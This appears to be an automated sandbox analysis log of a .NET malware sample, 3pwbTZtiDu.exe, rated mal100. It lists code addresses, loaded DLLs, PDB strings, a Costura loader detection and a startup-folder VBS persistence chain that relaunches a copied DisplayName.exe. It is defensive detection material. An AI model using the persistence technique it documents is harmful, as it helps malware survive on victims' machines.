                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_05717B709_2_05717B70
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_057164509_2_05716450
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_057164989_2_05716498
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_0571648A9_2_0571648A
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_057100409_2_05710040
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_057100079_2_05710007
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_0571800F9_2_0571800F
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_05717B609_2_05717B60
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_057EA2109_2_057EA210
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_057EE5799_2_057EE579
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_057EEDF09_2_057EEDF0
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_057EEDE19_2_057EEDE1
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_057EE5889_2_057EE588
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_057EC6609_2_057EC660
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_057EC6509_2_057EC650
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_057EF1199_2_057EF119
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_057E48F89_2_057E48F8
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_057F5D109_2_057F5D10
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_057F60479_2_057F6047
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_057F73289_2_057F7328
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_057F29089_2_057F2908
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_057F18989_2_057F1898
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_05838D099_2_05838D09
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_058351CB9_2_058351CB
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_05B1E4B09_2_05B1E4B0
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_05B1E1109_2_05B1E110
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_05B0001E9_2_05B0001E
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_05B000409_2_05B00040
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeCode function: 9_2_05B03B679_2_05B03B67
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6656 -s 2296
                  Source: 3pwbTZtiDu.exe, 00000000.00000002.2592427552.0000000002946000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 3pwbTZtiDu.exe
                  Source: 3pwbTZtiDu.exe, 00000000.00000002.2592427552.0000000002857000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs 3pwbTZtiDu.exe
                  Source: 3pwbTZtiDu.exe, 00000000.00000002.2613752688.0000000005C00000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs 3pwbTZtiDu.exe
                  Source: 3pwbTZtiDu.exe, 00000000.00000002.2591097026.0000000000A5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 3pwbTZtiDu.exe
                  Source: 3pwbTZtiDu.exe, 00000000.00000002.2592427552.000000000294F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameadobees.exe0 vs 3pwbTZtiDu.exe
                  Source: 3pwbTZtiDu.exe, 00000000.00000002.2611963383.0000000003933000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs 3pwbTZtiDu.exe
                  Source: 3pwbTZtiDu.exe, 00000000.00000002.2613068702.00000000059A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDiiwwqenrfg.dll" vs 3pwbTZtiDu.exe
                  Source: 3pwbTZtiDu.exe, 00000000.00000002.2611963383.0000000003818000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs 3pwbTZtiDu.exe
                  Source: 3pwbTZtiDu.exe, 00000000.00000002.2614175348.0000000005D00000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 3pwbTZtiDu.exe
                  Source: 3pwbTZtiDu.exe, 00000000.00000000.2377278090.0000000000544000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameadobees.exe0 vs 3pwbTZtiDu.exe
                  Source: 3pwbTZtiDu.exeBinary or memory string: OriginalFilenameadobees.exe0 vs 3pwbTZtiDu.exe
                  Source: 3pwbTZtiDu.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: classification engineClassification label: mal100.expl.evad.winEXE@6/12@1/1
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DisplayName.vbsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeMutant created: NULL
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5600
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6656
                  Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\411c3a04-b51d-47a5-ac5a-9d05e3dbe7edJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DisplayName.vbs"
                  Source: 3pwbTZtiDu.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 3pwbTZtiDu.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: 3pwbTZtiDu.exeReversingLabs: Detection: 69%
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeFile read: C:\Users\user\Desktop\3pwbTZtiDu.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\3pwbTZtiDu.exe "C:\Users\user\Desktop\3pwbTZtiDu.exe"
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6656 -s 2296
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DisplayName.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\DisplayName.exe "C:\Users\user\AppData\Roaming\DisplayName.exe"
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5600 -s 2256
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\DisplayName.exe "C:\Users\user\AppData\Roaming\DisplayName.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\DisplayName.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: 3pwbTZtiDu.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: 3pwbTZtiDu.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: 3pwbTZtiDu.exe, 00000000.00000002.2591097026.0000000000A90000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdb source: WER6AAF.tmp.dmp.5.dr, WERC448.tmp.dmp.11.dr
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: 3pwbTZtiDu.exe, 00000000.00000002.2612911375.00000000058A0000.00000004.00000020.00020000.00000000.sdmp, DisplayName.exe, 00000009.00000002.2789351577.0000000005420000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb\9gp& source: DisplayName.exe, 00000009.00000002.2771699318.00000000006E0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb? source: WER6AAF.tmp.dmp.5.dr, WERC448.tmp.dmp.11.dr
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: 3pwbTZtiDu.exe, 00000000.00000002.2592427552.0000000002946000.00000004.00000800.00020000.00000000.sdmp, 3pwbTZtiDu.exe, 00000000.00000002.2614175348.0000000005D00000.00000004.08000000.00040000.00000000.sdmp, DisplayName.exe, 00000009.00000002.2773183696.00000000025C3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Roaming\DisplayName.PDBP source: DisplayName.exe, 00000009.00000002.2771699318.0000000000787000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdbs source: 3pwbTZtiDu.exe, 00000000.00000002.2612911375.00000000058A0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbH%Bp source: DisplayName.exe, 00000009.00000002.2771699318.00000000006E0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: 3pwbTZtiDu.exe, 00000000.00000002.2592427552.0000000002946000.00000004.00000800.00020000.00000000.sdmp, 3pwbTZtiDu.exe, 00000000.00000002.2614175348.0000000005D00000.00000004.08000000.00040000.00000000.sdmp, DisplayName.exe, 00000009.00000002.2773183696.00000000025C3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdb source: WER6AAF.tmp.dmp.5.dr, WERC448.tmp.dmp.11.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: DisplayName.exe, 00000009.00000002.2771699318.00000000006E0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: 3pwbTZtiDu.exe, 00000000.00000002.2613752688.0000000005C00000.00000004.08000000.00040000.00000000.sdmp, 3pwbTZtiDu.exe, 00000000.00000002.2611963383.0000000003933000.00000004.00000800.00020000.00000000.sdmp, 3pwbTZtiDu.exe, 00000000.00000002.2611963383.0000000003818000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: O8o0C:\Windows\mscorlib.pdb source: 3pwbTZtiDu.exe, 00000000.00000002.2590976222.00000000008F7000.00000004.00000010.00020000.00000000.sdmp, DisplayName.exe, 00000009.00000002.2771516501.00000000004F7000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.ni.pdbRSDS source: WER6AAF.tmp.dmp.5.dr, WERC448.tmp.dmp.11.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: DisplayName.exe, 00000009.00000002.2771699318.0000000000787000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: 3pwbTZtiDu.exe, 00000000.00000002.2613752688.0000000005C00000.00000004.08000000.00040000.00000000.sdmp, 3pwbTZtiDu.exe, 00000000.00000002.2611963383.0000000003933000.00000004.00000800.00020000.00000000.sdmp, 3pwbTZtiDu.exe, 00000000.00000002.2611963383.0000000003818000.00000004.00000800.00020000.00000000.sdmp, WER6AAF.tmp.dmp.5.dr, WERC448.tmp.dmp.11.dr
                  Source: Binary string: System.Configuration.pdb source: WER6AAF.tmp.dmp.5.dr, WERC448.tmp.dmp.11.dr
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb! source: 3pwbTZtiDu.exe, 00000000.00000002.2591097026.0000000000B45000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdbMZ@ source: WER6AAF.tmp.dmp.5.dr, WERC448.tmp.dmp.11.dr
                  Source: Binary string: System.Configuration.pdbp source: WER6AAF.tmp.dmp.5.dr
                  Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 3pwbTZtiDu.exe, 00000000.00000002.2612911375.00000000058A0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.pdb source: WER6AAF.tmp.dmp.5.dr, WERC448.tmp.dmp.11.dr
                  Source: Binary string: System.pdb source: WER6AAF.tmp.dmp.5.dr, WERC448.tmp.dmp.11.dr
                  Source: Binary string: System.Xml.ni.pdbRSDS# source: WER6AAF.tmp.dmp.5.dr, WERC448.tmp.dmp.11.dr
                  Source: Binary string: System.Core.ni.pdb source: WER6AAF.tmp.dmp.5.dr, WERC448.tmp.dmp.11.dr
                  Source: Binary string: %%.pdb source: 3pwbTZtiDu.exe, 00000000.00000002.2590976222.00000000008F7000.00000004.00000010.00020000.00000000.sdmp, DisplayName.exe, 00000009.00000002.2771516501.00000000004F7000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Windows.Forms.pdb source: WER6AAF.tmp.dmp.5.dr, WERC448.tmp.dmp.11.dr
                  Source: Binary string: C:\Users\user\AppData\Roaming\DisplayName.PDB source: DisplayName.exe, 00000009.00000002.2771516501.00000000004F7000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: Microsoft.Win32.TaskScheduler.pdb source: WER6AAF.tmp.dmp.5.dr, WERC448.tmp.dmp.11.dr
                  Source: Binary string: mscorlib.pdb source: DisplayName.exe, 00000009.00000002.2789351577.0000000005420000.00000004.00000020.00020000.00000000.sdmp, WER6AAF.tmp.dmp.5.dr, WERC448.tmp.dmp.11.dr
                  Source: Binary string: System.Configuration.pdbMZ source: WERC448.tmp.dmp.11.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: 3pwbTZtiDu.exe, 00000000.00000002.2612911375.00000000058A0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdbRSDSw source: WER6AAF.tmp.dmp.5.dr, WERC448.tmp.dmp.11.dr
                  Source: Binary string: mscorlib.ni.pdb source: WER6AAF.tmp.dmp.5.dr, WERC448.tmp.dmp.11.dr
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb source: 3pwbTZtiDu.exe, 00000000.00000002.2591097026.0000000000B45000.00000004.00000020.00020000.00000000.sdmp, DisplayName.exe, 00000009.00000002.2789351577.0000000005420000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdb source: WER6AAF.tmp.dmp.5.dr, WERC448.tmp.dmp.11.dr
                  Source: Binary string: \??\C:\Users\user\Desktop\3pwbTZtiDu.PDB source: 3pwbTZtiDu.exe, 00000000.00000002.2612911375.0000000005911000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbQD source: DisplayName.exe, 00000009.00000002.2789351577.0000000005420000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\Desktop\3pwbTZtiDu.PDB source: 3pwbTZtiDu.exe, 00000000.00000002.2590976222.00000000008F7000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER6AAF.tmp.dmp.5.dr, WERC448.tmp.dmp.11.dr
                  Source: Binary string: System.ni.pdb source: WER6AAF.tmp.dmp.5.dr, WERC448.tmp.dmp.11.dr
                  Source: Binary string: System.Core.ni.pdbRSDS source: WER6AAF.tmp.dmp.5.dr, WERC448.tmp.dmp.11.dr

                  Data Obfuscation

                  barindex
                  Yara detected Costura Assembly Loader
                  Source: Yara matchFile source: 9.2.DisplayName.exe.34ea678.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.3pwbTZtiDu.exe.5ba0000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.3pwbTZtiDu.exe.386a678.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2613644694.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2592427552.0000000002857000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2788513573.00000000034EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2611963383.0000000003818000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2773183696.00000000024D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 3pwbTZtiDu.exe PID: 6656, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: DisplayName.exe PID: 5600, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_027B321F push edi; iretd 0_2_027B3222
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05AACC98 pushad ; ret 0_2_05AACCA1
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05AC51A0 pushad ; retf 0_2_05AC51F9
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05AC519B pushad ; retf 0_2_05AC51F9
                  Source: C:\Users\user\Desktop\3pwbTZtiDu.exeCode function: 0_2_05AC4A6B push eax; iretd 0_2_05AC5021
